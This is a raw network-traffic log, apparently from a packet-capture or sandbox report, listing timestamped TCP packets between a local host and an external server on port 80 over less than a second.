Sep 27, 2024 00:15:00.734071016 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.734074116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.734082937 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.734098911 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.734127998 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.734461069 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.734472990 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.734483957 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.734508038 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.734529018 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.734600067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.734611988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.734623909 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.734646082 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.734674931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.734793901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.734807014 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.734819889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.734844923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.734864950 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.734869957 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.734877110 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.734889984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.734903097 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.734903097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.734926939 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.734935999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.735037088 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735053062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735064030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735074997 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735080004 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.735086918 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735099077 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735107899 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.735110044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735121012 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735132933 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735136032 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.735155106 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.735168934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.735560894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735595942 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735608101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735620022 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.735630035 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.735650063 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735651970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.735662937 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735687971 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.735703945 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.735801935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735855103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.735913992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735925913 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735938072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.735960960 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.735986948 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.736016035 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736058950 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.736100912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736112118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736145973 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.736222029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736265898 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.736288071 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736303091 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736329079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.736344099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.736351013 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736362934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736377001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736388922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736394882 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.736427069 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.736532927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736545086 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736556053 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736567020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736577988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736581087 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.736588955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736598015 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.736601114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736613035 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.736613989 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736625910 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736640930 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.736669064 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.736732006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736743927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736758947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736772060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.736776114 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.736797094 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.736820936 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.737279892 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737292051 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737318993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737329960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737330914 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.737341881 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737351894 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.737354994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737366915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737376928 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.737399101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.737423897 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.737515926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737529039 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737540007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737550974 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737556934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.737562895 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737575054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737576008 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.737586021 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737596989 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737601995 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.737610102 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737615108 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.737634897 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.737657070 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737659931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.737669945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.737701893 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.737718105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.738151073 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738198996 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.738250971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738270044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738307953 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.738336086 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738348961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738360882 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738373995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738384008 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.738395929 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.738428116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.738495111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738507986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738518953 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738528967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738540888 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738542080 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.738550901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738562107 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738567114 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.738575935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738576889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.738586903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738605022 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.738631010 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.738682032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738693953 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738704920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738717079 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.738724947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.738739014 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.738768101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.739197016 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.739228964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.739243031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.739243984 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.739264011 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.739281893 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.739310980 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.739322901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.739334106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.739346981 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.739356995 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.739378929 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.739398956 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.739511013 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.739522934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.739532948 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.739559889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.739561081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.739572048 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.739584923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.739586115 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.739609003 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.739631891 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.796468973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.796571970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.796606064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.796621084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.796654940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.796655893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.796669006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.796680927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.796693087 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.796726942 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.796753883 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.796765089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.796776056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.796787977 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.796792030 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.796799898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.796812057 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.796813965 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.796844006 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.796859026 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.796888113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.796899080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.796926975 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.796942949 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.797708988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.797719955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.797732115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.797759056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.797760010 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.797770977 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.797779083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.797781944 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.797799110 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.797800064 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.797823906 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.797848940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.797854900 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.797894001 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.804913998 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.804927111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.804939032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.804982901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.804994106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.805006027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.805008888 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.805017948 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.805054903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.805100918 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.805150986 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.812971115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813000917 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813013077 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813029051 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813040018 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813066959 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813072920 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813081026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813091040 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813107967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813117027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813153028 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813225985 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813237906 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813250065 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813261986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813266039 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813292980 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813304901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813317060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813328028 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813338995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813344955 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813360929 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813388109 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813400984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813411951 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813421011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813431978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813437939 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813441038 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813452959 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813468933 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813528061 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813539028 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813549042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813560963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813570023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813571930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813587904 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813613892 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813715935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813726902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813738108 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813746929 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813756943 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813756943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813769102 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813781023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813785076 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813791990 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813802958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813810110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813815117 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813826084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813832998 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813838005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813841105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813873053 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813951015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813963890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813973904 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813985109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.813990116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.813996077 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814008951 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814013004 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.814039946 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.814044952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814054966 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814066887 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.814083099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814094067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814099073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.814105988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814122915 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.814140081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.814163923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814174891 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814186096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814204931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.814205885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814232111 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.814260006 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.814359903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814372063 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814383030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814393044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814394951 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.814404011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814409971 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.814415932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814426899 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814435959 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.814440012 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814451933 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814464092 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.814490080 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.814589024 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814600945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.814611912 CEST	80	49708	46.8.231.109	192.168.2.5
